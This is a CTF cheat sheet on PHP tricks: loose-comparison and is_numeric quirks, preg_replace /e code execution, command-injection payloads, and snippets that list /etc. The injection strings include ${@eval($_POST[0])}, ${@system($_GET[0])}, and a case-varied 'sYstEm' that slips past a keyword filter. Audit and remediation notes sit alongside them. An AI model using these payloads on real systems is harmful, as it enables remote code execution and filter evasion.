PHP
PHP Code that could help in CTF
Information
Comparison
#Comparisons
// Loose comparison (==) converts numeric strings to numbers before comparing.
// Use === wherever the operands come from a request, so both type and value must match.
var_dump(0 == "a"); // PHP < 8: "a" is cast to 0, so 0 == 0 -> true; PHP 8+: 0 is cast to "0" and compared as a string -> false
var_dump("1" == "01"); // both are numeric strings: 1 == 1 -> true
var_dump("10" == "1e1"); // both are numeric strings: 10 == 10 -> true
var_dump(100 == "1e2"); // "1e2" is read as 100: 100 == 100 -> true
var_dump(.0 == "00"); // 0 == 0 -> true
is_numeric()
is_numeric(" \t\r\n 123") => true
is_numeric(' 87') => true
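is_numeric('87 ') => false (PHP < 8.0; PHP 8.0+ allows trailing whitespace and returns true)
is_numeric(' 87 ') => false (PHP < 8.0; true on PHP 8.0+)
is_numeric('0xdeadbeef') => true on PHP 5 only; PHP 7.0+ no longer treats hex strings as numeric and returns false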
# Returns True
' -.0'
'0.'
' +2.1e5'
' -1.5E+25'
'1.e5'
'9e9'
preg_replace
// The /e modifier makes preg_replace() evaluate the replacement string as PHP code.
// It was deprecated in PHP 5.5.0 and removed in PHP 7.0.0, so these calls only evaluate code on older runtimes.
// Remediation: replace every /e pattern with preg_replace_callback(); when auditing, search for preg_replace() patterns ending in an "e" flag.
// PHP function names are case-insensitive, so a filter matching the literal string "system" does not stop the calls below.
#Example1
preg_replace('/a/e', 'sYstEm(ls)', 'aaaa');
#Example2
preg_replace('/a/e', '$output = `cat flag.txt`; echo "<pre>$output</pre>";', 'aaaa');
#Example3
preg_replace('/a/e', 'sYstEm("ls")', 'aaaa');
File Upload Vulnerability
#Update Later
Command Injection
#POST
command=${@eval($_POST[0])}
- intercept request and send
* 0=ls
#GET
${@system($_GET[0])}&0=ls -la
system(ls)
Multiple Ways to Read Files/Directories
Opendir()
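<?php
// List every entry of a directory together with the type reported by filetype().
// $dir keeps its trailing slash because it is concatenated directly with each entry name below.
$dir = "/etc/";

if (is_dir($dir)) {
    $dh = opendir($dir);
    if ($dh !== false) {
        // readdir() returns false once the entries are exhausted and never returns true,
        // so the loop must stop on false. The strict comparison keeps an entry named "0"
        // from ending the listing early.
        while (($file = readdir($dh)) !== false) {
            echo "filename: $file : filetype: " . filetype($dir . $file) . "\n";
        }
        closedir($dh);
    }
}
?>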
Scandir()
<?php
// Fetch the listing of /etc twice: scandir() sorts ascending by default
// and descending when the second argument asks for it.
$target = '/etc';
$ascending = scandir($target);
$descending = scandir($target, SCANDIR_SORT_DESCENDING); // constant equal to the literal 1

// Dump both arrays in the same order they were read.
print_r($ascending);
print_r($descending);
?>
Readdir()
<?php
// Walk /etc through a raw directory handle, showing the safe and the unsafe loop condition.
if ($handle = opendir('/etc')) {
echo "Directory handle: $handle\n";
echo "Entries:\n";
/* Correct: compare strictly against false, the value readdir() returns at the end of the directory. */
while (false !== ($entry = readdir($handle))) {
echo "$entry\n";
}
/* WRONG: a truthiness test stops early on any entry whose name evaluates to false, such as "0".
   As written, this loop also runs after the first loop has already consumed the handle. */
while ($entry = readdir($handle)) {
echo "$entry\n";
}
closedir($handle);
}
Glob()
<?php
// Report the size in bytes of every *.txt file directly under /etc.
$matches = glob("/etc/*.txt");
foreach ($matches as $filename) {
    $bytes = filesize($filename);
    echo "$filename size " . $bytes . "\n";
}
?>
References